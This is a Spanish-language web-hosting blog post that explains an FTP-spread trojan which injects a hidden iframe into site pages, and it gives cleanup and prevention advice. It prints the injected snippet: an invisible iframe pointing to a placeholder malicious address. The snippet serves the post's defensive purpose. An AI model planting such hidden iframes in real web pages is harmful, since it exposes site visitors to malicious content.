¿Virus iframe? ¿Conocía este virus?

¿Virus iframe? ¿Conocía este virus?

Seguramente si es un/una internauta promedio utilizando un hosting -como casi todos- nunca había oido hablar de este virus, pero no se preocupe, le vamos a explicar de que se trata.

En si es un troyano/virus que se instala en nuestra computadora y cada vez que nosotros nos conectamos al FTP de nuestra página, automáticamente inserta un código en todas nuestras páginas.  SI!!!!!!!, asi como lee! como si no fuera suficiente con los virus que podemos llegar a tener en nuestra Computadora, ahora también debemos cuidar nuestras paginas webs.

¿Como funciona?

Cada vez que nosotros nos conectamos a cualquier sitio FTP ,el virus automáticamente inserta a nuestras paginas un código que básicamente es un iframe ( iframe por inline frame o marco incorporado en inglés) es un elemento HTML que permite insertar o incrustar un documento HTML dentro de otro documento HTML) entonces todos nuestros visitantes corren peligro al entrar a nuestra pagina. El problema es mayor cuando Google o los antivirus o las PCs de nuestros visitantes, le bloquean el acceso a las paginas y perdemos visitas o potenciales clientes.

Le presento el famoso Iframe:

<iframe src=”http://Direccion_de_sitio_malicionso” width=109 height=147 style=”visibility: hidden”/>
Este código se debe encontrar entre las etiquetas <body> Ese simple código puede resultar un dolor de cabeza enorme!!

¿Como se elimina?

Lamentablemente es mas difícil hacerlo que decirlo, la solución es muy obvia, si tiene los archivos. Lo que tiene que hacer es sobre-escribirlos, pero si no los tiene?? -pasa comúnmente- tiene que abrir cada archivo y borrar el código, sí, ARCHIVO POR ARCHIVO, pero si su hosting ofrece o tiene contratado algún servicio de respaldo automático – 305 STREAM, INC. incluye el servicio de respaldo automaticámente Gratis –  puede restaurar una copia solo de los archivos infectados.

Pero si es cliente de 305 STREAM, INC. hay buenas noticias, lo unico que tiene que hacer es enviarnos un ticket notificando la infección y nosotros hacemos el trabajo sucio por usted. Contamos con un equipo de expertos en seguridad que están a su servicio. WOW!

Pero OJO, de nada sirve desinfectar si primero no limpia su Computadora desde donde se conecta al FTP, no importa cuantas veces desinfecte sus archivos del FTP, si no limpia su Computadora cada vez que se conecte se infectaran, le recomendamos lo siguiente:

Instalar hijackthis en su Computadora para buscar cualquier troyano
Cambie todas las contraseñas de acceso a sus cuentas FTP y del sitio en general
Evitar conectarse a su FTP desde computadoras publicas.

*A menudo nuestros clientes piensan que el servidor donde esta su página tiene el virus, pero no es así, el virus está en la propia Computadora de los clientes.

About the Author
WordPress and WHMCS integration by i-Plugins
WhatsApp chat